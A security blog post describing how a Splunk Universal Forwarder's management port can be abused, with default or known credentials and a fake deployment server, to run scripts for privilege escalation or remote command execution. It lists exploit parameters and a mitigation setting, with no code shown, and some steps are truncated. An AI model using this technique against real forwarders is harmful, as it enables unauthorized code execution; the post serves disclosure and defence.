Splunk Universal Forwarder Hijacking

Background

Airman
Airman
Feb 27, 2018 · 2 min read

Splunk Universal Forwarder includes a management service that is listening on TCP port 8089 and is used for managing the forwarder. By default it accepts remote connections, but doesn’t allow remote connections with default credentials (admin/changeme). The exploit described below can be used in the following ways:

  • Local privilege escalation to the user that the forwarder is running under, if the default password is not changed.
  • Remote command execution (with the privileges that the forwarder is running under) if the default password has been changed and is known to the attacker.

Please note, this does not necessarily qualify as a vulnerability in the product, though running a management service on the forwarder is not a good architectural decision in my opinion as it increases the attack surface unnecessarily. Not running the service, or forcing to change the default admin password on install, would’ve been better options. The forwarder does not have any account lockout mechanism in place, so admin password brute forcing is feasible.

How Does It Work

  1. The forwarder then connects to the attacker machine and requests deployment applications.
  2. The exploit responds to the request with a fake application containing a script input instructing the forwarder to run the script.
  3. After a delay, the exploit connects again to the forwarder management port and reverts the deployment server configuration.

The Exploit

Exploit parameters (review and change within the .py script):

RHOST — target machine, 127.0.0.1 for local privilege escalation. Default Splunk credentials are only accepted for local connections.

RPORT — management port of the Splunk Universal Forwarder, 8089 by default.

LHOST — attacker’s IP where the for

LPORT — port number to run the fake deployment server on.

SPLUNK_USER/SPLUNK_PASSWORD — credentials to authenticate to the forwarder.

SCRIPT — path to the script to be sent to the forwarder for execution.

Mitigation

Option 2: disable management network port on the forwarder by adding the following to $SPLUNK_HOME/etc/system/local/system.conf:

[httpServer]
disableDefaultPort = true

This can be done remotely from the deployment server: https://answers.splunk.com/answers/434029/how-to-disable-the-universal-forwarder-default-man.html

Note: this might not be a supported configuration, and some CLI commands will stop working (for example, splunk show deploy-poll) as they use the management service.

Airman

Written by

Airman

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.

Airman

Written by

Airman

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store